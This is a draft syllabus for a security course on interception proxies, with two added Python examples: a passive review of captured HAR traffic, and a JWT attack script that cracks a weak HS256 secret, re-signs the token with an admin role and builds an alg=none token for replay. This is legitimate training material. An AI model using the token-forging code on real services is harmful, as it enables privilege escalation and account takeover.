Course Releases Feb 18
Interception Proxies for Modern Security Assessments:
This course is designed to provide in-depth knowledge of interception proxies like Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper. By mastering these tools, you’ll gain the skills necessary to conduct security assessments on modern applications.
What You’ll Learn:
- Set up and use various interception proxies effectively.
- Understand the unique strengths and weaknesses of Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper.
- Perform security testing on web applications, mobile apps, and thick clients.
- Explore plugin ecosystems and third-party integrations for advanced capabilities.
- Analyze real-world case studies of vulnerabilities discovered using interception proxies.
Why Choose This Course?
- Comprehensive and Tool-Agnostic: Learn multiple tools to tailor your approach based on project needs.
- Practical Focus: Hands-on labs and real-world case studies ensure you can apply concepts immediately.
- Expert Guidance: Jhaddix shares proven methods and advanced tips gleaned from years of experience.
Who Should Enroll?
- Security professionals seeking to expand their toolkit.
- Penetration testers and bug bounty hunters aiming to deepen their expertise.
- Developers and QA specialists integrating security into their workflows.
- Anyone looking to master modern interception proxies for effective security assessments.
What’s Included:
- Video modules covering theoretical and practical topics.
- Hands-on labs with real-world scenarios.
** This syllabus is still in draft. It may not represent the full gamut of topics in the final class **
Course Outline:
Module 1: Introduction to Interception Proxies
Why Interception Proxies Are Essential:
- The role of proxies in application security testing.
- Practical applications: Debugging, reconnaissance, and exploitation.
Overview of Key Tools:
- Burp Suite: The industry standard for web application security testing.
- Caido: A fresh perspective on interception proxies with modern UI/UX.
- OWASP ZAP: Open-source and highly extensible for community-driven testing.
- Fiddler: A powerful tool for analyzing HTTP/S traffic from Windows-based thick clients.
- Hopper: A brief overview of an alternative for Mac systems.
Activity:
- Install and configure the proxy tools to intercept basic web traffic.
- Discuss common "gotchas".
Module 2: Tool-Specific Deep Dives
Burp Suite:
- Setting up projects, workspaces, and target scoping.
- Using key tools: Repeater, Intruder, and Scanner.
- Must-have plugins.
Caido:
- Exploring the modern interface and workflow.
- Comparison with Burp Suite: Strengths and use cases.
OWASP ZAP:
- Crawling and passive scanning workflows.
- Extending functionality with add-ons like Active Scan Rules and HUD.
- Integrating ZAP into automated DAST pipelines.
Fiddler:
- Why Fiddler?
- Capturing and replaying traffic for debugging and testing.
- A cursory look at FiddlerScript for custom scenarios.
Hopper:
- Analyzing and intercepting traffic from thick clients.
Module 3: Web Application Testing with Proxies
Workflows for Web Application Testing:
- Mapping applications with crawlers and manual exploration.
- Identifying and exploiting common vulnerabilities: XSS, SQLi, CSRF, and more.
Enhancing Productivity:
- Leveraging automation and macros in Burp Suite and ZAP.
- Integrating with command-line workflows for testers.
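As an added example for the Module 3 workflow above (mapping an application and running passive checks over what the proxy captured; the same script serves the Module 4 activity of analyzing intercepted API traffic), here is a small command-line review of a proxy export. This is not course material or any vendor's code: it assumes the proxy can export captured traffic as a HAR (HTTP Archive) file, the HAR below is constructed inline so it runs offline, and api.example.test is a hypothetical host.

```python
"""Passive review of traffic exported from an interception proxy.

Added example for this syllabus, not material from the course or from any
proxy vendor. It assumes the proxy can export captured traffic as a HAR
(HTTP Archive) file; the HAR below is constructed inline so the script runs
offline, and api.example.test is a hypothetical host.
"""
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed sample export: two requests to a hypothetical API host.
SAMPLE_HAR = json.dumps({"log": {"entries": [
    {"request": {"method": "GET",
                 "url": "https://api.example.test/v1/users/42?session=abc123&debug=1",
                 "headers": [{"name": "Authorization", "value": "Bearer <captured>"}]},
     "response": {"status": 200,
                  "headers": [{"name": "Content-Type", "value": "application/json"},
                              {"name": "Strict-Transport-Security", "value": "max-age=31536000"}]}},
    {"request": {"method": "POST",
                 "url": "http://api.example.test/v1/login",
                 "headers": [{"name": "Content-Type", "value": "application/json"}]},
     "response": {"status": 200,
                  "headers": [{"name": "Content-Type", "value": "text/html"},
                              {"name": "Set-Cookie", "value": "sid=xyz; Path=/"}]}},
]}})

# Query parameter names that should never travel in a URL (they end up in logs and history).
SENSITIVE_PARAMS = {"session", "token", "password", "api_key", "apikey", "debug"}
# Response headers whose absence is worth a note during a web assessment.
EXPECTED_HEADERS = {"strict-transport-security", "content-security-policy", "x-content-type-options"}


def endpoint_map(har_text):
    """Distinct (method, path) pairs: the application map that crawling and manual browsing build up."""
    entries = json.loads(har_text)["log"]["entries"]
    seen = {(e["request"]["method"], urlsplit(e["request"]["url"]).path) for e in entries}
    return sorted(seen)


def review_har(har_text):
    """Return (url, finding) tuples for the passive checks a tester runs over captured traffic."""
    findings = []
    for e in json.loads(har_text)["log"]["entries"]:
        req, resp = e["request"], e["response"]
        url = req["url"]
        parts = urlsplit(url)
        if parts.scheme == "http":
            findings.append((url, "cleartext HTTP request"))
        for name, _ in parse_qsl(parts.query):
            if name.lower() in SENSITIVE_PARAMS:
                findings.append((url, f"sensitive parameter in query string: {name}"))
        present = {h["name"].lower() for h in resp["headers"]}
        for missing in sorted(EXPECTED_HEADERS - present):
            findings.append((url, f"missing response header: {missing}"))
        for h in resp["headers"]:
            if h["name"].lower() != "set-cookie":
                continue
            cookie_name = h["value"].split("=", 1)[0]
            # Attributes after the first ';' are the cookie flags (Path, Secure, HttpOnly, ...).
            attrs = {a.strip().lower() for a in h["value"].split(";")[1:]}
            for flag in ("secure", "httponly"):
                if flag not in attrs:
                    findings.append((url, f"cookie {cookie_name} set without {flag}"))
    return findings


if __name__ == "__main__":
    for method, path in endpoint_map(SAMPLE_HAR):
        print(method, path)
    for url, finding in review_har(SAMPLE_HAR):
        print(f"{finding}: {url}")
```

In practice you would replace SAMPLE_HAR with the file the proxy exported and pipe the output into your notes; the point of running it from the command line is that the checks repeat identically on every export, which is what "enhancing productivity" means once the target has hundreds of endpoints.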
Module 4: Mobile Application and Thick Client Testing
Mobile Application Proxying:
- Setting up proxies for mobile traffic interception.
- Testing APIs, analyzing insecure storage, and bypassing SSL pinning.
Thick Client Proxying with Hopper and Fiddler:
- Reverse engineering traffic from proprietary protocols.
- Analyzing communication channels for security flaws.
Activity:
- Intercept and analyze API traffic from a mobile application and a thick client.
Module 5: Plugins, Extensions, and Third-Party Integrations
Extending Proxy Capabilities:
- Key plugins for Burp Suite and ZAP that enhance testing efficiency.
- Exploring Caido’s ecosystem of integrations.
- Introduction to fuzzing payload projects.
Integrating Fuzzers and Automation Tools:
- Using ffuf, wfuzz, and other tools with proxies.
Authentication and Session Handling:
- Testing authentication flows (OAuth, SAML, JWT).
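As an added example for the authentication-flow item above (it is not course material), here is what a tester typically does with a JWT captured in the proxy before replaying it: decode the header and claims without verifying, try a list of candidate HMAC secrets, and build the tampered variants (a re-signed token with a changed claim, and an alg=none token) that get sent back through Repeater to see whether the server checks the signature. The token, its weak secret and the candidate list are all constructed here so the script runs offline.

```python
"""Inspecting and tampering with a captured JWT.

Added example for this syllabus, not course material. The captured token,
the weak secret "secret" and the CANDIDATES list are constructed here so the
script runs offline; against a real target the token comes from the proxy
history and the candidates from a wordlist.
"""
import base64
import hashlib
import hmac
import json


def b64url_decode(s):
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def make_hs256(claims, secret):
    """Issue an HS256 token (stands in for the application's own issuer)."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def inspect_jwt(token):
    """Decode header and claims without verifying: the first thing to do with a captured token."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def weak_secret_check(token, candidates):
    """Return the first candidate secret that reproduces the token's HS256 signature, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    sig = b64url_decode(sig_b64)
    for candidate in candidates:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, sig):
            return candidate
    return None


def forge_with_secret(token, secret, changed_claims):
    """Re-sign the captured claims with a recovered secret after changing some of them."""
    _, claims = inspect_jwt(token)
    claims.update(changed_claims)
    return make_hs256(claims, secret)


def forge_alg_none(token, changed_claims):
    """Build the unsigned alg=none variant used to test whether the server skips verification."""
    _, claims = inspect_jwt(token)
    claims.update(changed_claims)
    header = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header}.{body}."


def verify_hs256(token, secret):
    """The check a correct server performs: pin the algorithm, then verify the MAC."""
    header, _ = inspect_jwt(token)
    if header.get("alg") != "HS256":
        return False
    return weak_secret_check(token, [secret]) == secret


# Constructed: a token the proxy captured for a low-privilege user, signed with a weak secret.
CAPTURED = make_hs256({"sub": "42", "role": "user"}, "secret")
# Hypothetical candidate list; a real run would use a wordlist.
CANDIDATES = ["password", "secret", "changeme"]


if __name__ == "__main__":
    print("header, claims:", inspect_jwt(CAPTURED))
    found = weak_secret_check(CAPTURED, CANDIDATES)
    print("recovered secret:", found)
    if found:
        print("re-signed admin token:", forge_with_secret(CAPTURED, found, {"role": "admin"}))
    print("alg=none variant:", forge_alg_none(CAPTURED, {"role": "admin"}))
```

Send each forged token through Repeater as the Authorization bearer value and compare responses: a server that accepts the alg=none variant is not verifying signatures at all, and one that accepts the re-signed token confirms the recovered secret. verify_hs256 shows the correct server-side behaviour for contrast; it rejects the alg=none token because the algorithm is pinned before the MAC is checked.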
Module 6: Case Studies and Advanced Scenarios
Case Studies:
- Examples of real-world vulnerabilities uncovered using proxies.
- Creative solutions to challenges like WAFs, CAPTCHAs, and rate limiting.